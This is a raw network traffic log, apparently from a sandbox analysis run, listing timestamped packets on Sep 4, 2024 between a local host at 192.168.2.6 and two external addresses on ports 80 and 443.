Sep 4, 2024 17:37:08.484042883 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484050035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484051943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484064102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484074116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484077930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484086037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484097958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484107971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484146118 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484371901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484407902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484431028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484440088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484451056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484460115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484466076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484483957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484502077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484508991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484519005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484528065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484549046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484555960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484723091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484735012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484743118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484752893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484766960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484769106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484772921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484781027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484791040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484800100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484802961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484810114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484821081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484824896 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484831095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484836102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484841108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484847069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484850883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484858036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484860897 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484916925 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485029936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485039949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485049963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485060930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485063076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485071898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485088110 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485112906 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485183001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485193014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485202074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485210896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485219955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485228062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485230923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485240936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485249996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485253096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485260963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485271931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485274076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485280991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485287905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485296965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485299110 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485306978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485318899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485325098 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485333920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485342979 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485356092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485383987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485805988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485825062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485835075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485841990 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485845089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485853910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485857010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485867977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485872984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485877991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485879898 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485888004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485893011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485901117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485909939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485910892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485920906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485930920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485937119 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485940933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485951900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485955954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485961914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485972881 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485975027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.485981941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485991955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.485995054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.486004114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.486013889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.486022949 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.486041069 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.486052036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.486557007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.486567020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.486576080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.486586094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.486593962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.486596107 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.486608982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.486617088 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.486619949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.486625910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.486656904 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.503773928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.503807068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.503818989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.503823996 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.503840923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.503855944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.503927946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.503940105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.503947973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.503957987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.503968000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.503972054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.503989935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.504005909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.505389929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.505409956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.505419016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.505433083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.505445957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.505455017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.505506992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.505518913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.505527973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.505539894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.505549908 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.505564928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.505588055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.505605936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.505645990 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.505987883 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.505996943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506010056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506035089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.506047010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.506093979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506103992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506113052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506139994 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.506155968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.506223917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506234884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506243944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506253958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506268024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.506284952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.506344080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506356001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506366014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506376982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506386995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.506386995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.506402016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.506421089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.510396957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.510442019 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.510492086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.510503054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.510512114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.510521889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.510530949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.510540962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.510544062 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.510545015 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.510564089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.510576963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.510615110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.511116028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.511154890 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.511157036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.511171103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.511193037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.511204004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.511240959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.511259079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.511270046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.511280060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.511281967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.511302948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.511322975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512026072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512067080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512072086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512079000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512105942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512115955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512135983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512146950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512156010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512166977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512176037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512176991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512207985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512207985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512599945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512641907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512653112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512666941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512690067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512701035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512727976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512737989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512747049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512756109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512767076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512767076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512797117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512797117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512871027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512880087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512887955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512898922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512908936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512917042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512921095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.512923956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512942076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512963057 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.512978077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.513006926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514115095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514159918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514178991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514189959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514220953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514312029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514321089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514329910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514339924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514350891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514363050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514384985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514395952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514405966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514415979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514422894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514426947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514439106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514437914 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514451981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514461040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514476061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514494896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514672995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514691114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514702082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514710903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514722109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514733076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514736891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514767885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514909029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514920950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514930010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514938116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514944077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514946938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514955044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514959097 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514969110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514980078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.514980078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.514991999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515002012 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515023947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515032053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515045881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515070915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515077114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515086889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515091896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515108109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515114069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515125036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515149117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515167952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515180111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515187979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515208960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515224934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515232086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515265942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515280008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515322924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515721083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515732050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515739918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515758991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515764952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515770912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515783072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515800953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515813112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515824080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515831947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.515851021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.515866995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.567580938 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.567600012 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.567646980 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.567656994 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.567687035 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.567698002 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.568380117 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.568394899 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.568434954 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.568442106 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.568478107 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.570897102 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.570911884 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.570945024 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.570955038 CEST	443	49727	158.69.225.124	192.168.2.6
